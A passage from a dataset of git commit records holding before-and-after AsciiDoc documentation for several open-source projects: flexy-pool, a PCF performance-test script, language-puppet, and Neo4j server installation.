simple DBA tasks\n * link:docs\/containers.adoc#crunchy-upgrade[crunchy-upgrade] - allows you to perform a major postgres upgrade using pg_upgrade\n * link:docs\/containers.adoc#crunchy-backrest-restore[crunchy-backrest-restore] - allows you to perform a pgbackrest restore\n\n\nimage::docs\/containers.png?raw=true[]\n\nFor Kubernetes users of these containers, there is an associated\nproject worth taking a look at that uses the containers found\nin this repo and provides a higher level automation.\nThat project is link:https:\/\/github.com\/crunchydata\/postgres-operator[PostgresOperator]\n\n=== Installation\n\nComplete build and install documentation is found here: link:docs\/install.adoc[Install Docs]. The provided Dockerfiles build the containers\non a Centos 7 base image and use the community PostgreSQL RPMs.\n\nCrunchy provides a commercially supported version of these containers\nbuilt upon RHEL 7 and the Crunchy supported PostgreSQL. 
Contact Crunchy\nfor more details at http:\/\/www.crunchydata.com.\n\n=== Examples\n\nVarious examples are provided in link:docs\/examples.adoc[the Examples documentation] for running Docker,\nKubernetes, and OpenShift environments.\n\nYou will need to set up your environment as per the link:docs\/install.adoc[Install documentation] in order to\nexecute the examples.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eaedaaaa44a5dddb3330078fa72add8352616e91","subject":"Add user guide link","message":"Add user guide link\n","repos":"wgpshashank\/flexy-pool,mosoft521\/flexy-pool,vladmihalcea\/flexy-pool","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= flexy-pool\nAuthor <mih_vlad@yahoo.com>\nv1.0.0, 2014-02-25\n\n:toc:\n:imagesdir: images\n:homepage: http:\/\/vladmihalcea.com\/\n\n== Introduction\n\nThe flexy-pool library brings adaptability to a given Connection Pool, allowing it to resize on demand.\nThis is very handy since most connection pools offer a limited set of dynamic configuration strategies.\n\n== Features \n\n* extensive connection pool support(Bitronix TM, C3PO, DBCP 1, DBCP 2, BoneCP, HikariCP)\n* statistics support\n** source connection acquiring time histogram\n** total connection acquiring time histogram\n** retries attempts histogram\n** maximum CP size histogram\n** connection request count histogram\n** connection lease time histogram\n\nhttps:\/\/github.com\/vladmihalcea\/flexy-pool\/wiki\/Flexy-Pool-User-Guide[User Guide]\n\n== 1.0 TODO list\n\n* explain all configuration settings\n* explain jmx metrics\n* add real-life case study\n","old_contents":"= flexy-pool\nAuthor <mih_vlad@yahoo.com>\nv1.0.0, 2014-02-25\n\n:toc:\n:imagesdir: images\n:homepage: http:\/\/vladmihalcea.com\/\n\n== Introduction\n\nThe flexy-pool library brings adaptability to a given Connection Pool, allowing it to resize on demand.\nThis is very handy since most connection pools offer a limited set of dynamic configuration strategies.\n\n== Features \n\n* extensive connection pool support(Bitronix TM, C3PO, DBCP 1, DBCP 2, BoneCP, HikariCP)\n* statistics support\n** source connection acquiring time histogram\n** total connection acquiring time histogram\n** retries attempts histogram\n** maximum CP size histogram\n** connection request count histogram\n** connection lease time histogram\n\n== 1.0 TODO list\n\n* write installation guide\n* write user guide\n* explain jmx metrics\n* explain all configuration settings\n* add real-life case study\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b587d01d38918f1eacdc0458e00ae392e1b8f60e","subject":"Updated README with screenshots.","message":"Updated README with screenshots.\n","repos":"nevenc-pivotal\/pcf-environment-performance-test","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= pcf-environment-performance-test\n\nThis is a set of scripts to help you automate performance metrics of your PCF deployment process.\n\n\n== Install Script\n\nYou can simply clone the script to your Mac\/Unix\/Linux BASH environment, e.g.\n----\n git clone https:\/\/github.com\/nevenc-pivotal\/pcf-environment-performance-test.git\n cd pcf-environment-performance-test\n----\n\n\n== Configure Script\n\nIn order to make the script work, you need to configure separate directories for each environment, e.g.\n----\n emea ~\/.cf-emea\n corp ~\/.cf-corp\n pws ~\/.cf-pws\n myorg ~\/.cf-myorg\n ...\n----\n\nYou can set an environment by setting `CF_HOME` to specific environment, 
and setting the target and logging in; repeat for each environment separately, e.g.\n\n----\n export CF_HOME=~\/cf-emea\n cf api --skip-ssl-validation https:\/\/api.cf.emea.pivotal.io\n cf login\n Email> you@emea.pivotal.io\n Password> **********\n \n export CF_HOME=~\/cf-corp\n cf api --skip-ssl-validation https:\/\/api.cf.corp.pivotal.io\n cf login\n Email> you@corp.pivotal.io\n Password> **********\n \n export CF_HOME=~\/cf-pws\n cf api https:\/\/api.run.pivotal.io\n cf login\n Email> you@email.com\n Password> **********\n \n export CF_HOME=~\/cf-myorg\n cf api --skip-ssl-validation https:\/\/api.cf.myorg.com\n cf login\n Email> you@email.com\n Password> **********\n\n----\n\n\n\n== Execute Script\n\nYou can execute the script by invoking it directly, e.g.\n\n----\n.\/test_performance_deploy.sh\n\nPushing spring-music to emea\nreal 78.36\nuser 1.75\nsys 1.70\n\nRemoving spring-music from emea\nreal 9.05\nuser 0.07\nsys 0.02\n\nPushing spring-music to emea-2015\nreal 253.44\nuser 4.80\nsys 6.29\n\nRemoving spring-music from emea-2015\nreal 8.28\nuser 0.07\nsys 0.02\n\nPushing spring-music to pws\nreal 2.69\nuser 0.11\nsys 0.02\n\nRemoving spring-music from pws\nreal 0.59\nuser 0.10\nsys 0.02\n\n----\n\n\nYou can invoke the test script multiple times by invoking the script runner with a number parameter, e.g.\n\n----\n.\/run_test_x_times.sh 2\n\nrun: 1\n\nPushing spring-music to emea\nreal 78.36\nuser 1.75\nsys 1.70\n\nRemoving spring-music from emea\nreal 9.05\nuser 0.07\nsys 0.02\n\nPushing spring-music to emea-2015\nreal 253.44\nuser 4.80\nsys 6.29\n\nRemoving spring-music from emea-2015\nreal 8.28\nuser 0.07\nsys 0.02\n\nPushing spring-music to pws\nreal 2.69\nuser 0.11\nsys 0.02\n\nRemoving spring-music from pws\nreal 0.59\nuser 0.10\nsys 0.02\n\n\n\nrun: 2\n\nPushing spring-music to emea\nreal 58.17\nuser 1.46\nsys 1.21\n\nRemoving spring-music from emea\nreal 9.17\nuser 0.07\nsys 0.02\n\nPushing spring-music to emea-2015\nreal 236.64\nuser 4.51\nsys 5.86\n\nRemoving spring-music from emea-2015\nreal 8.14\nuser 0.07\nsys 0.02\n\nPushing spring-music to pws\nreal 1.85\nuser 0.12\nsys 0.02\n\nRemoving spring-music from pws\nreal 0.57\nuser 0.11\nsys 0.02\n\n----\n\n\n== Results\n\nYou can feed the results into a spreadsheet for nicer presentation, e.g.\n\nimage::cf_push.png?raw=true[cf push response times]\nimage::cf_delete.png?raw=true[cf delete response times]\n\n\n\n","old_contents":"= pcf-environment-performance-test\n\nThis is a set of scripts to help you automate performance metrics of your PCF deployment process.\n\n\n== Install Script\n\nYou can simply clone the script to your Mac\/Unix\/Linux BASH environment, e.g.\n----\n git clone https:\/\/github.com\/nevenc-pivotal\/pcf-environment-performance-test.git\n cd pcf-environment-performance-test\n----\n\n\n== Configure Script\n\nIn order to make the script work, you need to configure separate directories for each environment, e.g.\n----\n emea ~\/.cf-emea\n corp ~\/.cf-corp\n pws ~\/.cf-pws\n myorg ~\/.cf-myorg\n ...\n----\n\nYou can set an environment by setting `CF_HOME` to specific environment, and setting target and login, repeat for each environment separately, e.g.\n\n----\n export CF_HOME=~\/cf-emea\n cf api --skip-ssl-validation https:\/\/api.cf.emea.pivotal.io\n cf login\n Email> you@emea.pivotal.io\n Password> **********\n \n export CF_HOME=~\/cf-corp\n cf api --skip-ssl-validation https:\/\/api.cf.corp.pivotal.io\n cf login\n Email> you@corp.pivotal.io\n Password> **********\n \n export 
CF_HOME=~\/cf-pws\n cf api https:\/\/api.run.pivotal.io\n cf login\n Email> you@email.com\n Password> **********\n \n export CF_HOME=~\/cf-myorg\n cf api --skip-ssl-validation https:\/\/api.cf.myorg.com\n cf login\n Email> you@email.com\n Password> **********\n----\n\n== Execute Script\n\nYou can execute script by invoking it directly, e.g.\n\n----\n.\/test_performance_deploy.sh\n\nPushing spring-music to emea\nreal 78.36\nuser 1.75\nsys 1.70\n\nRemoving spring-music from emea\nreal 9.05\nuser 0.07\nsys 0.02\n\nPushing spring-music to emea-2015\nreal 253.44\nuser 4.80\nsys 6.29\n\nRemoving spring-music from emea-2015\nreal 8.28\nuser 0.07\nsys 0.02\n\nPushing spring-music to pws\nreal 2.69\nuser 0.11\nsys 0.02\n\nRemoving spring-music from pws\nreal 0.59\nuser 0.10\nsys 0.02\n\n----\n\n\nYou can invoke test script multiple times by invoking the script runner with a number parameter, e.g.\n\n----\n.\/run_test_x_times.sh 2\n\n\n.\/run_test_x_times.sh\n\nrun: 1\n\nPushing spring-music to emea\nreal 78.36\nuser 1.75\nsys 1.70\n\nRemoving spring-music from emea\nreal 9.05\nuser 0.07\nsys 0.02\n\nPushing spring-music to emea-2015\nreal 253.44\nuser 4.80\nsys 6.29\n\nRemoving spring-music from emea-2015\nreal 8.28\nuser 0.07\nsys 0.02\n\nPushing spring-music to pws\nreal 2.69\nuser 0.11\nsys 0.02\n\nRemoving spring-music from pws\nreal 0.59\nuser 0.10\nsys 0.02\n\n\nrun: 2\n\nPushing spring-music to emea\nreal 58.17\nuser 1.46\nsys 1.21\n\nRemoving spring-music from emea\nreal 9.17\nuser 0.07\nsys 0.02\n\nPushing spring-music to emea-2015\nreal 236.64\nuser 4.51\nsys 5.86\n\nRemoving spring-music from emea-2015\nreal 8.14\nuser 0.07\nsys 0.02\n\nPushing spring-music to pws\nreal 1.85\nuser 0.12\nsys 0.02\n\nRemoving spring-music from pws\nreal 0.57\nuser 0.11\nsys 0.02\n\n----\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1d1c450170b207d35c6bda52c17e26a21bb2377c","subject":"Doc: README cleanup","message":"Doc: README cleanup\n","repos":"bartavelle\/language-puppet,bartavelle\/language-puppet","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Language-puppet\n\nA library to work with Puppet manifests, test them and eventually replace everything ruby.\n\n.Basic usage:\n```\npuppetresources -p \/where\/your\/puppet\/files\/are -o node.name.com\n```\n\n.Easy build instructions:\n```\ncd language-puppet\ncabal update\ncabal sandbox init\ncabal install -j -p\n```\n\nThere are also http:\/\/lpuppet.banquise.net\/download\/[binary packages available] .\n\n== Puppetresources\n\nThe `puppetresources` command is a command line utility that let you interactively compute catalogs on your local computer. It will then display them on screen, in a nice,\nuser-friendly colored fashion. It is much faster than its ruby counterpart, and has been designed for giving assistance to the Puppet catalog writer. Here is a list of command line\narguments :\n\n`-p` or `--puppetdir`::\n\nThis is the only mandatory argument. It accepts a directory or file path as the argument. 
\n`-t` or `--type`::\n\nFilters the resources of the resulting catalog by type by specifying a regular expression. Only the resources whose types match the submitted regexp will be displayed.\n\n`-n` or `--name`::\n\nFilters the resources of the resulting catalog by name by specifying a regular expression. Only the resources whose names match the submitted regexp will be displayed.\n\n`-c` or `--showcontent`::\n\nIf `-n` is the exact name of a file type resource defined in the catalog, this will display the file content more nicely. Useful for debugging templates.\n+\nExample: `puppetresources -p . -o mynodename -n '\/etc\/motd' --showcontent`\n\n`--loglevel` or `-v`::\n\nPossible values are: DEBUG, INFO, NOTICE, WARNING, ERROR, CRITICAL, ALERT, EMERGENCY.\n\n`--pdburl`::\n\nExpects the url of a live PuppetDB.\n\n`--pdbfile`::\n\nExpects a path to a *fake* PuppetDB, represented as a YAML file on disk. This option is pretty slow but can be invaluable to test exported resources tricks.\n\n`--hiera`::\n\nExpects the path to the `hiera.yaml` file.\n\n`--ignoremodules`::\n\nExpects a list of comma-separated modules. The interpreter will not try to evaluate the defined types and classes from these modules. This is useful for using modules that use bad\npractices forbidden by `puppetresources`.\n\n`--nousergrouptest`::\n\nBy default, `puppetresources` will check that all users and groups referenced by `cron`, `file`, etc. types are defined somewhere in the catalog (except for a list of widely\navailable users, such as `root`). This flag disables these tests.\n\n`--commitdb`::\n\nWhen this flag is set, exported resources, catalogs and facts are saved in the PuppetDB. This is useful in conjunction with `--pdbfile`.\n\n`--checkExported`::\n\nWhen this flag is set, exported resources are saved in the PuppetDB. This is useful in conjunction with `--pdbfile`.\n\n`-j` or `--JSON`::\n\nDisplays the catalog as a Puppet-compatible JSON file, that can then be used with `puppet apply`.\n\n`--facts-override` and `--facts-defaults`::\n\nBoth options expect a path to a YAML file defining facts. The first option will override the facts that are collected locally, while the second will merely provide default values\nfor them.\n\n`--strict`::\n\nEnable strict mode.\nThe strict mode is less permissive than vanilla Puppet.\nIt is meant to prevent some pitfalls by enforcing good practices.\nFor instance it refuses to silently ignore\/convert `undef` variables.\n\n\n== pdbQuery\n\nThe `pdbQuery` command is used to work with different implementations of PuppetDB (the official one with its HTTP API, the file-based backend and dummy ones). 
Its main use is to\nexport data from production PuppetDB to a file in order to debug some issue with `puppetresources`. Here is a list of command line arguments :\n\n`-l` or `--location`::\n\nThe URL of the PuppetDB when working with a remote PuppetDB, a file path when working with the file-based test implementation.\n\n`-t` or `--pdbtype`::\n\nThe type of PuppetDB to work with:\n\n* dummy: a dummy PuppetDB.\n* remote: a \"real\" PuppetDB, accessed by its HTTP API.\n* test: a file-based backend emulating a PuppetDB.\n\n.Commands\n`dumpfacts`::\n\nDump all facts, and store them in `\/tmp\/allfacts.yaml`.\n\n`nodes`::\n\nDump all nodes\n\n`snapshot`::\n\nCreate a test DB from the current DB\n\n`addfacts`::\n\nAdds facts to the test DB for the given node name, if they are not already defined.\n\n== Unsupported Puppet idioms or features\n\npuppet functions::\n * the `require` function is not supported (see https:\/\/github.com\/bartavelle\/language-puppet\/issues\/17[issue #17])\n * the deprecated `import` function is not supported (see https:\/\/github.com\/bartavelle\/language-puppet\/issues\/82[issue #82])\n\ncustom ruby functions::\nCurrently the only way to support your custom ruby functions is to rewrite them in Lua.\n\nknown differences::\nLooking up an undef key is silent in Puppet but it is an error with puppetresources.\n","old_contents":"= Language-puppet\n\nA library to work with Puppet manifests, test them and eventually replace everything ruby.\n\n.Basic usage:\n```\npuppetresources -p \/where\/your\/puppet\/files\/are -o node.name.com\n```\n\n.Easy build instructions:\n```\ncd language-puppet\ncabal update\ncabal sandbox init\ncabal install -j -p\n```\n\nThere are also http:\/\/lpuppet.banquise.net\/download\/[binary packages available] .\n\n== Puppetresources\n\nThe `puppetresources` command is a command line utility that let you interactively compute catalogs on your local computer. It will then display them on screen, in a nice,\nuser-friendly colored fashion. It is much faster than its ruby counterpart, and has been designed for giving assistance to the Puppet catalog writer. Here is a list of command line\narguments :\n\n`-p` or `--puppetdir`::\n\nThis is the only mandatory argument. It accepts a directory or file path as the argument. In the absence of `-o`, it will parse and display the puppet file given as a parameter.\nWith `-o` it must point to the base of the puppet directory (the directory that contains the `modules` and `manifests` directories).\n\n`-o` or `--node`::\n\nThis let you specify the name of the node you wish to compute the catalog for.\n+\nIf you use `allnodes` as the node name, it will compute the catalogs for all nodes that are specified in `site.pp` (this will not work for regexp-specified or the default nodes). This is useful\nfor writing automated tests, to check a change didn't break something.\n+\nIf you use `deadcode` as the node name, it will also compute the catalogs for all nodes, but will display the list of puppet files that have not been used, and that might be\ndeprecated.\n+\nYou might want to run the program with `+RTS -N` with those two modes.\n\n`-t` or `--type`::\n\nFilters the resources of the resulting catalog by type, but specifying a regular expression. Only the resources whose types match the submitted regexp will be displayed.\n\n`-n` or `--name`::\n\nFilters the resources of the resulting catalog by name, but specifying a regular expression. 
Only the resources whose names match the submitted regexp will be displayed.\n\n`-c` or `--showcontent`::\n\nIf `-n` is the exact name of a file type resource defined in the catalog, this will display more nicely display the file content. Useful for debugging templates.\nEx: puppetresources -p . -o mynodename -n '\/etc\/motd' --showcontent\n\n`--loglevel` or `-v`::\n\nExpects a log level. Possible values are : DEBUG, INFO, NOTICE, WARNING, ERROR, CRITICAL, ALERT, EMERGENCY.\n\n`--pdburl`::\n\nExpects the url of a live PuppetDB.\n\n`--pdbfile`::\n\nExpects a path to a *fake* PuppetDB, represented as a YAML file on disk. This option is pretty slow but can be invaluable to test exported resources tricks.\n\n`--hiera`::\n\nExpects the path to the `hiera.yaml` file.\n\n`--ignoremodules`::\n\nExpects a list of comma-separated modules. The interpreter will not try to evaluate the defined types and classes from this module. This is useful for using modules that use bad\npractices forbidden by `puppetresources`.\n\n`--nousergrouptest`::\n\nBy default, `puppetresources` will check that all users and groups referenced by `cron`, `file`, etc. types are defined somewhere in the catalog (except for a list of widely\navailable users, such as `root`). This flag disables these tests.\n\n`--commitdb`::\n\nWhen this flag is set, exported resources, catalogs and facts are saved in the PuppetDB. This is useful in conjunction with `--pdbfile`.\n\n`--checkExported`::\n\nWhen this flag is set, exported resources are saved in the PuppetDB. This is useful in conjunction with `--pdbfile`.\n\n`-j` or `--JSON`::\n\nDisplays the catalog as a Puppet-compatible JSON file, that can then be used with `puppet apply`.\n\n`--facts-override` and `--facts-defaults`::\n\nBoth options expect a path to a YAML file defining facts. The first option will override the facts that are collected locally, while the second will merely provide default values\nfor them.\n\n`--strict`::\n\nEnable strict mode.\nThe strict mode is less permissive than vanilla Puppet.\nIt is meant to prevent some pitfalls by enforcing good practices.\nFor instance it refuses to silently ignore\/convert `undef` variables.\n\n\n== pdbQuery\n\nThe `pdbQuery` command is used to work with different implementations of PuppetDB (the official one with its HTTP API, the file-based backend and dummy ones). Its main use is to\nexport data from production PuppetDB to a file in order to debug some issue with `puppetresources`. 
Here is a list of command line arguments :\n\n`-l` or `--location`::\n\nThe URL of the PuppetDB when working with a remote PuppetDB, a file path when working with the file-based test implementation.\n\n`-t` or `--pdbtype`::\n\nThe type of PuppetDB to work with:\n\n* dummy: a dummy PuppetDB.\n* remote: a \"real\" PuppetDB, accessed by its HTTP API.\n* test: a file-based backend emulating a PuppetDB.\n\n.Commands\n`dumpfacts`::\n\nDump all facts, and store them in `\/tmp\/allfacts.yaml`.\n\n`nodes`::\n\nDump all nodes\n\n`snapshot`::\n\nCreate a test DB from the current DB\n\n`addfacts`::\n\nAdds facts to the test DB for the given node name, if they are not already defined.\n\n== Unsupported Puppet idioms or features\n\npuppet functions::\n * the `require` function is not supported (see https:\/\/github.com\/bartavelle\/language-puppet\/issues\/17[issue #17])\n * the deprecated `import` function is not supported (see https:\/\/github.com\/bartavelle\/language-puppet\/issues\/82[issue #82])\n\ncustom ruby functions::\nCurrently the only way to support your custom ruby functions is to rewrite them in Lua.\n\nknown differences::\nLooking up an undef key is silent in Puppet but it is an error with puppetresources.\n","returncode":0,"stderr":"","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"fdce4a9b4ea74abd41dc4fabed5292dc0c7cf63e","subject":"Fix typo in installation docs","message":"Fix typo in installation docs\n","repos":"HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j","old_file":"community\/server\/src\/docs\/ops\/server-installation.asciidoc","new_file":"community\/server\/src\/docs\/ops\/server-installation.asciidoc","new_contents":"[[server-installation]]\n= Server Installation\n\n== Deployment Scenarios ==\n\nAs a developer, you may wish to download Neo4j and run it locally on your desktop computer.\nWe recommend this as an easy way to discover Neo4j.\n\n* For Windows, see <<windows-install>>.\n* For Unix\/Linux, see <<linux-install>>.\n* For OSX, see <<osx-install>>.\n\nAs a systems administrator, you may wish to install Neo4j using a packaging system so you can ensure that a cluster of machines have identical installs.\nSee <<linux-packages>> for more information on this.\n\nFor information on High Availability, please refer to <<ha>>.\n\n== Prerequisites ==\n\nWith the exception of our Windows and Mac Installers, you'll need a Java Virtual Machine installed on your computer.\nWe recommend that you install http:\/\/openjdk.java.net\/[OpenJDK 8 (preferred) or 7] or http:\/\/www.oracle.com\/technetwork\/java\/javase\/downloads\/index.html[Oracle Java 8 (preferred) or 7].\n\n[[server-permissions]]\n== Setting Proper File Permissions ==\n\nWhen installing Neo4j Server, keep in mind that the _bin\/neo4j_ executable will need to be run by some OS system user, and that user will need write permissions to some files\/directories.\nThis goes specifically for the _data\/graph.db_ directory.\nThat user will also need execute permissions on other files, such as those in _bin\/_.\n\nIt is recommended to either choose or create a user who will own and manage the Neo4j Server.\nThis user should own the entire Neo4j directory, so make sure to untar\/unzip it as this user and not with `sudo` (UNIX\/Linux\/OSx) etc.\n\nIf _data\/graph.db_ is not writable by the user Neo4j won't be able to write anything either to the store or its log files.\nAs a result any logs would be appended to _console.log_.\nThe following error message would indicate a possible permissions 
issue: `Write transactions to database disabled`.\n\n[[windows-install]]\n== Windows ==\n\n[[windows-installer]]\n=== Windows Installer ===\n\n1. Download the version that you want from http:\/\/neo4j.com\/download\/.\n * Select the appropriate version and architecture for your platform.\n2. Double-click the downloaded installer file.\n3. Follow the prompts.\n\n[NOTE]\nThe installer will prompt to be granted Administrator privileges.\nNewer versions of Windows come with a SmartScreen feature that may prevent the installer from running -- you can make it run anyway by clicking \"More info\" on the \"Windows protected your PC\" screen.\n\n[TIP]\nIf you install Neo4j using the windows installer and you already have an existing instance of Neo4j the installer will select a new install directory by default.\nIf you specify the same directory it will ask if you want to upgrade.\nThis should proceed without issue although some users have reported a `JRE is damaged` error.\nIf you see this error simply install Neo4j into a different location.\n\n[[windows-console]]\n=== Windows Console Application ===\n1. Download the latest release from http:\/\/neo4j.com\/download\/.\n * Select the appropriate Zip distribution.\n2. Right-click the downloaded file, click Extract All.\n * Refer to the top-level extracted directory as: +NEO4J_HOME+\n3. Consult <<powershell>> for how to start or install Neo4j.\n\n[NOTE]\nSome users have reported problems on Windows when using the ZoneAlarm firewall.\nIf you are having problems getting large responses from the server, or if the web interface does not work, try disabling ZoneAlarm.\nContact ZoneAlarm support to get information on how to resolve this.\n\n[[linux-install]]\n== Linux ==\n\n[[linux-packages]]\n=== Linux Packages ===\n\n* For Debian packages, see the instructions at http:\/\/debian.neo4j.org\/.\n\nAfter installation you may have to do some platform specific configuration and performance tuning.\nFor that, refer to <<performance-guide>>.\n\n[[unix-console]]\n=== Unix Console Application ===\n\n1. Download the latest release from http:\/\/neo4j.com\/download\/.\n * Select the appropriate tar.gz distribution for your platform.\n2. Extract the contents of the archive, using: `tar -xf <filename>`\n * Refer to the top-level extracted directory as: +NEO4J_HOME+\n3. Change directory to: `$NEO4J_HOME`\n * Run: `.\/bin\/neo4j console`\n4. Stop the server by typing Ctrl-C in the console.\n\n=== Linux Service ===\n\nThe `neo4j` command can also be used with `start`, `stop`, `restart` or `status` instead of `console`.\nBy using these actions, you can create a Neo4j service.\nSee the <<neo4j-manpage,neo4j man page>> for further details.\n\n[CAUTION]\nThis approach to running Neo4j as a service is deprecated.\nWe strongly advise you to run Neo4j from a package where feasible.\n\nYou can build your own `init.d` script.\nSee for instance the Linux Standard Base specification on http:\/\/refspecs.linuxfoundation.org\/LSB_3.1.0\/LSB-Core-generic\/LSB-Core-generic\/tocsysinit.html[system initialization], or one of the many https:\/\/gist.github.com\/chrisvest\/7673244[samples] and http:\/\/www.linux.com\/learn\/tutorials\/442412-managing-linux-daemons-with-init-scripts[tutorials].\n\n[[osx-install]]\n== Mac OSX ==\n\n=== Mac OSX Installer ===\n\n1. Download the _.dmg_ installer that you want from http:\/\/neo4j.com\/download\/.\n2. Click the downloaded installer file.\n3. 
Drag the Neo4j icon into the Applications folder.\n\n[TIP]\nIf you install Neo4j using the Mac installer and already have an existing instance of Neo4j the installer will ensure that both the old and new versions can co-exist on your system.\n\n=== Running Neo4j from the Terminal ===\n\nThe server can be started in the background from the terminal with the command `neo4j start`, and then stopped again with `neo4j stop`.\nThe server can also be started in the foreground with `neo4j console` -- then its log output will be printed to the terminal.\n\nThe `neo4j-shell` command can be used to interact with Neo4j from the command line using Cypher. It will automatically connect to any\nserver that is running on localhost with the default port, otherwise it will show a help message. You can alternatively start the\nshell with an embedded Neo4j instance, by using the `-path path\/to\/data` argument -- note that only a single instance of Neo4j\ncan access the database files at a time.\n\n=== OSX Service ===\n\nUse the standard OSX system tools to create a service based on the `neo4j` command.\n\n=== A note on Java on OS X Mavericks ===\n\nUnlike previous versions, OS X Mavericks does not come with Java pre-installed. You might encounter this the first time you run Neo4j, when OS X will trigger a popup offering to install Java SE 6.\n\nJava SE 6 is incompatible with Neo4j {neo4j-version}, so we strongly advise you to skip installing Java SE 6 if you have no other uses for it. Instead, for Neo4j {neo4j-version} we recommend you install Java SE 8 (preferred) or 7 from Oracle (http:\/\/www.oracle.com\/technetwork\/java\/javase\/downloads\/index.html) as that is what we support for production use.\n\n== Multiple Server instances on one machine ==\n\nNeo4j can be set up to run as several instances on one machine, providing for instance several databases for development.\n\nFor how to set this up, see <<ha-local-cluster>>.\nJust use the Neo4j edition of your choice, follow the guide and remember not to set the servers to run in HA mode.\n","old_contents":"[[server-installation]]\n= Server Installation\n\n== Deployment Scenarios ==\n\nAs a developer, you may wish to download Neo4j and run it locally on your desktop computer.\nWe recommend this as an easy way to discover Neo4j.\n\n* For Windows, see <<windows-install>>.\n* For Unix\/Linux, see <<linux-install>>.\n* For OSX, see <<osx-install>>.\n\nAs a systems administrator, you may wish to install Neo4j using a packaging system so you can ensure that a cluster of machines have identical installs.\nSee <<linux-packages>> for more information on this.\n\nFor information on High Availability, please refer to <<ha>>.\n\n== Prerequisites ==\n\nWith the exception of our Windows and Mac Installers, you'll need a Java Virtual Machine installed on your computer.\nWe recommend that you install http:\/\/openjdk.java.net\/[OpenJDK 8 (preferred) or 7] or http:\/\/www.oracle.com\/technetwork\/java\/javase\/downloads\/index.html[Oracle Java 8 (preferred) or 7].\n\n[[server-permissions]]\n== Setting Proper File Permissions ==\n\nWhen installing Neo4j Server, keep in mind that the _bin\/neo4j_ executable will need to be run by some OS system user, and that user will need write permissions to some files\/directories.\nThis goes specifically for the _data\/graph.db_ directory.\nThat user will also need execute permissions on other files, such as those in _bin\/_.\n\nIt is recommended to either choose or create a user who will own and manage the Neo4j Server.\nThis user 
should own the entire Neo4j directory, so make sure to untar\/unzip it as this user and not with `sudo` (UNIX\/Linux\/OSx) etc.\n\nIf _data\/graph.db_ is not writable by the user Neo4j won't be able to write anything either to the store or its log files.\nAs a result any logs would be appended to _console.log_.\nThe following error message would indicate a possible permissions issue: `Write transactions to database disabled`.\n\n[[windows-install]]\n== Windows ==\n\n[[windows-installer]]\n=== Windows Installer ===\n\n1. Download the version that you want from http:\/\/neo4j.com\/download\/.\n * Select the appropriate version and architecture for your platform.\n2. Double-click the downloaded installer file.\n3. Follow the prompts.\n\n[NOTE]\nThe installer will prompt to be granted Administrator privileges.\nNewer versions of Windows come with a SmartScreen feature that may prevent the installer from running -- you can make it run anyway by clicking \"More info\" on the \"Windows protected your PC\" screen.\n\n[TIP]\nIf you install Neo4j using the windows installer and you already have an existing instance of Neo4j the installer will select a new install directory by default.\nIf you specify the same directory it will ask if you want to upgrade.\nThis should proceed without issue although some users have reported a `JRE is damaged` error.\nIf you see this error simply install Neo4j into a different location.\n\n[[windows-console]]\n=== Windows Console Application ===\n1. Download the latest release from http:\/\/neo4j.com\/download\/.\n * Select the appropriate Zip distribution.\n2. Right-click the downloaded file, click Extract All.\n * Refer to the top-level extracted directory as: +NEO4J_HOME+\n3. Consult <<powershell>> for how to start or install Neo4j.\n\n[NOTE]\nSome users have reported problems on Windows when using the ZoneAlarm firewall.\nIf you are having problems getting large responses from the server, or if the web interface does not work, try disabling ZoneAlarm.\nContact ZoneAlarm support to get information on how to resolve this.\n\n[[linux-install]]\n== Linux ==\n\n[[linux-packages]]\n=== Linux Packages ===\n\n* For Debian packages, see the instructions at http:\/\/debian.neo4j.org\/.\n\nAfter installation you may have to do some platform specific configuration and performance tuning.\nFor that, refer to <<performance-guide>>.\n\n[[unix-console]]\n=== Unix Console Application ===\n\n1. Download the latest release from http:\/\/neo4j.com\/download\/.\n * Select the appropriate tar.gz distribution for your platform.\n2. Extract the contents of the archive, using: `tar -xf <filename>`\n * Refer to the top-level extracted directory as: +NEO4J_HOME+\n3. Change directory to: `$NEO4J_HOME`\n * Run: `.\/bin\/neo4j console`\n4. 
Stop the server by typing Ctrl-C in the console.\n\n=== Linux Service ===\n\nThe `neo4j` command can also be used with `start`, `stop`, `restart` or `status` instead of `console`.\nBy using these actions, you can create a Neo4j service.\nSee the <<neo4j-manpage,neo4j man page>> for further details.\n\n[CAUTION]\nThis approach to running Neo4j as a server is deprecated.\nWe strongly advise you to run Neo4j from a package where feasible.\n\nYou can build your own `init.d` script.\nSee for instance the Linux Standard Base specification on http:\/\/refspecs.linuxfoundation.org\/LSB_3.1.0\/LSB-Core-generic\/LSB-Core-generic\/tocsysinit.html[system initialization], or one of the many https:\/\/gist.github.com\/chrisvest\/7673244[samples] and http:\/\/www.linux.com\/learn\/tutorials\/442412-managing-linux-daemons-with-init-scripts[tutorials].\n\n[[osx-install]]\n== Mac OSX ==\n\n=== Mac OSX Installer ===\n\n1. Download the _.dmg_ installer that you want from http:\/\/neo4j.com\/download\/.\n2. Click the downloaded installer file.\n3. Drag the Neo4j icon into the Applications folder.\n\n[TIP]\nIf you install Neo4j using the Mac installer and already have an existing instance of Neo4j the installer will ensure that both the old and new versions can co-exist on your system.\n\n=== Running Neo4j from the Terminal ===\n\nThe server can be started in the background from the terminal with the command `neo4j start`, and then stopped again with `neo4j stop`.\nThe server can also be started in the foreground with `neo4j console` -- then it's log output will be printed to the terminal.\n\nThe `neo4j-shell` command can be used to interact with Neo4j from the command line using Cypher. It will automatically connect to any\nserver that is running on localhost with the default port, otherwise it will show a help message. You can alternatively start the\nshell with an embedded Neo4j instance, by using the `-path path\/to\/data` argument -- note that only a single instance of Neo4j\ncan access the database files at a time.\n\n=== OSX Service ===\n\nUse the standard OSX system tools to create a service based on the `neo4j` command.\n\n=== A note on Java on OS X Mavericks ===\n\nUnlike previous versions, OS X Mavericks does not come with Java pre-installed. You might encounter that the first time you run Neo4j, where OS X will trigger a popup offering you to install Java SE 6.\n\nJava SE 6 is incompatible with Neo4j {neo4j-version}, so we strongly advise you to skip installing Java SE 6 if you have no other uses for it. Instead, for Neo4j {neo4j-version} we recommend you install Java 